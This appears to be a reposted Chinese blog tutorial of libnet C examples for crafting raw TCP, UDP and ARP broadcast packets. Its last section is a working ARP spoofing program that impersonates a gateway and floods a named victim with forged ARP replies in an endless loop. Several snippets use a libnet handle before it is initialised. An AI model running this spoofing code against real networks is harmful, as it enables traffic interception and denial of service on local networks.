libnet发包例子(tcp udp arp广播)

#include <libnet.h>
int main() {
libnet_t *handle; /* Libnet句柄 */
int packet_size; /* 构造的数据包大小 */
char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
char *src_ip_str = "192.168.2.148"; /* 源IP地址字符串 */
char *dst_ip_str = "192.168.2.170"; /* 目的IP地址字符串 */
u_char src_mac[6] = {0x00, 0x0c, 0x29, 0xba, 0xee, 0xdd}; /* 源MAC */
u_char dst_mac[6] = {0x00, 0x0c, 0x29, 0x6d, 0x4d, 0x5c}; /* 目的MAC */
u_long dst_ip, src_ip; /* 网路序的目的IP和源IP */
char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
libnet_ptag_t eth_tag, ip_tag, tcp_tag, tcp_op_tag; /* 各层build函数返回值 */
u_short proto = IPPROTO_TCP; /* 传输层协议 */
u_char payload[255] = {0}; /* 承载数据的数组，初值为空 */
u_long payload_s = 0; /* 承载数据的长度，初值为0 */
/* 把目的IP地址字符串转化成网络序 */
dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
/* 把源IP地址字符串转化成网络序 */
src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
/* 初始化Libnet */
if ( (handle = libnet_init(LIBNET_LINK, device, error)) == NULL ) {
printf("libnet_init failure\n");
return (-1);
};
strncpy(payload, "test", sizeof(payload)-1); /* 构造负载的内容 */
payload_s = strlen(payload); /* 计算负载内容的长度 */
#if 0
/* 构建TCP的选项,通常在第一个TCP通信报文中设置MSS */
tcp_op_tag = libnet_build_tcp_options(
payload,
payload_s,
handle,
0
);
if (tcp_op_tag == -1) {
printf("build_tcp_options failure\n");
return (-2);
};
#endif
tcp_tag = libnet_build_tcp(
30330, /* 源端口 */
30331, /* 目的端口 */
8888, /* 序列号 */
8889, /* 确认号 */
TH_PUSH | TH_ACK, /* Control flags */
14600, /* 窗口尺寸 */
0, /* 校验和,0为自动计算 */
0, /* 紧急指针 */
LIBNET_TCP_H + payload_s, /* 长度 */
payload, /* 负载内容 */
payload_s, /* 负载内容长度 */
handle, /* libnet句柄 */
0 /* 新建包 */
);
if (tcp_tag == -1) {
printf("libnet_build_tcp failure\n");
return (-3);
};
/* 构造IP协议块，返回值是新生成的IP协议快的一个标记 */
ip_tag = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + payload_s, /* IP协议块的总长,*/
0, /* tos */
(u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */
0, /* frag 片偏移 */
(u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */
proto, /* 上层协议 */
0, /* 校验和，此时为0，表示由Libnet自动计算 */
src_ip, /* 源IP地址,网络序 */
dst_ip, /* 目标IP地址,网络序 */
NULL, /* 负载内容或为NULL */
0, /* 负载内容的大小*/
handle, /* Libnet句柄 */
0 /* 协议块标记可修改或创建,0表示构造一个新的*/
);
if (ip_tag == -1) {
printf("libnet_build_ipv4 failure\n");
return (-4);
};
/* 构造一个以太网协议块,只能用于LIBNET_LINK */
eth_tag = libnet_build_ethernet(
dst_mac, /* 以太网目的地址 */
src_mac, /* 以太网源地址 */
ETHERTYPE_IP, /* 以太网上层协议类型，此时为IP类型 */
NULL, /* 负载，这里为空 */
0, /* 负载大小 */
handle, /* Libnet句柄 */
0 /* 协议块标记，0表示构造一个新的 */
);
if (eth_tag == -1) {
printf("libnet_build_ethernet failure\n");
return (-5);
};
packet_size = libnet_write(handle); /* 发送已经构造的数据包*/
libnet_destroy(handle); /* 释放句柄 */
return (0);
}

UDP:

#include <libnet.h>
int main() {
libnet_t *handle; /* Libnet句柄 */
int packet_size; /* 构造的数据包大小 */
char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
char *src_ip_str = "192.168.2.148"; /* 源IP地址字符串 */
char *dst_ip_str = "192.168.2.170"; /* 目的IP地址字符串 */
u_char src_mac[6] = {0x00, 0x0c, 0x29, 0xba, 0xee, 0xdd}; /* 源MAC */
u_char dst_mac[6] = {0x00, 0x0c, 0x29, 0x6d, 0x4d, 0x5c}; /* 目的MAC */
u_long dst_ip, src_ip; /* 网路序的目的IP和源IP */
char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
libnet_ptag_t eth_tag, ip_tag, udp_tag; /* 各层build函数返回值 */
u_short proto = IPPROTO_UDP; /* 传输层协议 */
u_char payload[255] = {0}; /* 承载数据的数组，初值为空 */
u_long payload_s = 0; /* 承载数据的长度，初值为0 */
/* 把目的IP地址字符串转化成网络序 */
dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
/* 把源IP地址字符串转化成网络序 */
src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
/* 初始化Libnet */
if ( (handle = libnet_init(LIBNET_LINK, device, error)) == NULL ) {
printf("libnet_init failure\n");
return (-1);
};
strncpy(payload, "test", sizeof(payload)-1); /* 构造负载的内容 */
payload_s = strlen(payload); /* 计算负载内容的长度 */
udp_tag = libnet_build_udp(
30330, /* 源端口 */
30331, /* 目的端口 */
LIBNET_UDP_H + payload_s, /* 长度 */
0, /* 校验和,0为libnet自动计算 */
payload, /* 负载内容 */
payload_s, /* 负载内容长度 */
handle, /* libnet句柄 */
0 /* 新建包 */
);
if (udp_tag == -1) {
printf("libnet_build_tcp failure\n");
return (-3);
};
/* 构造IP协议块，返回值是新生成的IP协议快的一个标记 */
ip_tag = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* IP协议块的总长,*/
0, /* tos */
(u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */
0, /* frag 片偏移 */
(u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */
proto, /* 上层协议 */
0, /* 校验和，此时为0，表示由Libnet自动计算 */
src_ip, /* 源IP地址,网络序 */
dst_ip, /* 目标IP地址,网络序 */
NULL, /* 负载内容或为NULL */
0, /* 负载内容的大小*/
handle, /* Libnet句柄 */
0 /* 协议块标记可修改或创建,0表示构造一个新的*/
);
if (ip_tag == -1) {
printf("libnet_build_ipv4 failure\n");
return (-4);
};
/* 构造一个以太网协议块,只能用于LIBNET_LINK */
eth_tag = libnet_build_ethernet(
dst_mac, /* 以太网目的地址 */
src_mac, /* 以太网源地址 */
ETHERTYPE_IP, /* 以太网上层协议类型，此时为IP类型 */
NULL, /* 负载，这里为空 */
0, /* 负载大小 */
handle, /* Libnet句柄 */
0 /* 协议块标记，0表示构造一个新的 */
);
if (eth_tag == -1) {
printf("libnet_build_ethernet failure\n");
return (-5);
};
packet_size = libnet_write(handle); /* 发送已经构造的数据包*/
libnet_destroy(handle); /* 释放句柄 */
return (0);
}

ARP广播包:

#include <libnet.h>
int main() {
libnet_t *handle; /* Libnet句柄 */
int packet_size;
char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
u_int8_t *src_ip_str = "192.168.128.200"; /* 源IP地址字符串 */
u_int8_t *dst_ip_str = "192.168.128.88"; /* 目的IP地址字符串 */
u_int8_t src_mac[6] = {0x00, 0x0c, 0x29, 0x73, 0xfa, 0x86};/* 源MAC */
u_int8_t dst_mac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};/* 目的MAC,广播地址 */
/* 接收方MAC,ARP请求目的就是要询问对方MAC,所以这里填写0 */
u_int8_t rev_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
u_int32_t dst_ip, src_ip; /* 网路序的目的IP和源IP */
char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
libnet_ptag_t arp_proto_tag, eth_proto_tag;
/* 把目的IP地址字符串转化成网络序 */
dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
/* 把源IP地址字符串转化成网络序 */
src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
if ( dst_ip == -1 || src_ip == -1 ) {
printf("ip address convert error\n");
exit(-1);
};
/* 初始化Libnet,注意第一个参数和TCP初始化不同 */
if ( (handle = libnet_init(LIBNET_LINK_ADV, device, error)) == NULL ) {
printf("libnet_init: error [%s]\n", error);
exit(-2);
};
/* 构造arp协议块 */
arp_proto_tag = libnet_build_arp(
ARPHRD_ETHER, /* 硬件类型,1表示以太网硬件地址 */
ETHERTYPE_IP, /* 0x0800表示询问IP地址 */
6, /* 硬件地址长度 */
4, /* IP地址长度 */
ARPOP_REQUEST, /* 操作方式:ARP请求 */
src_mac, /* source MAC addr */
(u_int8_t *)&src_ip, /* src proto addr */
rev_mac, /* dst MAC addr */
(u_int8_t *)&dst_ip, /* dst IP addr */
NULL, /* no payload */
0, /* payload length */
handle, /* libnet tag */
0 /* Create new one */
);
if (arp_proto_tag == -1) {
printf("build IP failure\n");
exit(-3);
};
/* 构造一个以太网协议块
You should only use this function when
libnet is initialized with the LIBNET_LINK interface.*/
eth_proto_tag = libnet_build_ethernet(
dst_mac, /* 以太网目的地址 */
src_mac, /* 以太网源地址 */
ETHERTYPE_ARP, /* 以太网上层协议类型，此时为ARP请求 */
NULL, /* 负载，这里为空 */
0, /* 负载大小 */
handle, /* Libnet句柄 */
0 /* 协议块标记，0表示构造一个新的 */
);
if (eth_proto_tag == -1) {
printf("build eth_header failure\n");
return (-4);
};
packet_size = libnet_write(handle); /* 发送已经构造的数据包*/
libnet_destroy(handle); /* 释放句柄 */
return (0);
}

arp应答包(arp欺骗)

#include <libnet.h>
int main() {
libnet_t *handle; /* Libnet句柄 */
int packet_size;
char *device = "eth0"; /* 设备名字,也支持点十进制的IP地址,会自己找到匹配的设备 */
u_int8_t *src_ip_str = "192.168.2.30"; /* 冒充的网关IP */
u_int8_t *dst_ip_str = "192.168.2.170"; /* 干扰的目标IP */
u_int8_t src_mac[6] = {0x00, 0x0c, 0x29, 0x73, 0xfa, 0x11};/* 虚假的源MAC */
u_int8_t dst_mac[6] = {0x00, 0x0c, 0x29, 0x6d, 0x4d, 0x5c};/* 干扰的目标MAC */
u_int32_t dst_ip, src_ip; /* 网路序的目的IP和源IP */
char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
libnet_ptag_t arp_proto_tag, eth_proto_tag;
/* 把目的IP地址字符串转化成网络序 */
dst_ip = libnet_name2addr4(handle, dst_ip_str, LIBNET_RESOLVE);
/* 把源IP地址字符串转化成网络序 */
src_ip = libnet_name2addr4(handle, src_ip_str, LIBNET_RESOLVE);
if ( dst_ip == -1 || src_ip == -1 ) {
printf("ip address convert error\n");
exit(-1);
};
/* 初始化Libnet,注意第一个参数和TCP初始化不同 */
if ( (handle = libnet_init(LIBNET_LINK_ADV, device, error)) == NULL ) {
printf("libnet_init: error [%s]\n", error);
exit(-2);
};
/* 构造arp协议块 */
arp_proto_tag = libnet_build_arp(
ARPHRD_ETHER, /* 硬件类型,1表示以太网硬件地址 */
ETHERTYPE_IP, /* 0x0800表示询问IP地址 */
6, /* 硬件地址长度 */
4, /* IP地址长度 */
ARPOP_REPLY, /* 操作方式:ARP请求 */
src_mac, /* source MAC addr */
(u_int8_t *)&src_ip, /* src proto addr */
dst_mac, /* dst MAC addr */
(u_int8_t *)&dst_ip, /* dst IP addr */
NULL, /* no payload */
0, /* payload length */
handle, /* libnet tag */
0 /* Create new one */
);
if (arp_proto_tag == -1) {
printf("build IP failure\n");
exit(-3);
};
/* 构造一个以太网协议块
You should only use this function when
libnet is initialized with the LIBNET_LINK interface.*/
eth_proto_tag = libnet_build_ethernet(
dst_mac, /* 以太网目的地址 */
src_mac, /* 以太网源地址 */
ETHERTYPE_ARP, /* 以太网上层协议类型，此时为ARP请求 */
NULL, /* 负载，这里为空 */
0, /* 负载大小 */
handle, /* Libnet句柄 */
0 /* 协议块标记，0表示构造一个新的 */
);
if (eth_proto_tag == -1) {
printf("build eth_header failure\n");
return (-4);
};
while(1) {
packet_size = libnet_write(handle); /* 死循环发送arp欺骗广播 */
usleep(1000);
};
libnet_destroy(handle); /* 释放句柄 */
return (0);
}
from：http://blog.chinaunix.net/uid-10540984-id-3245098.html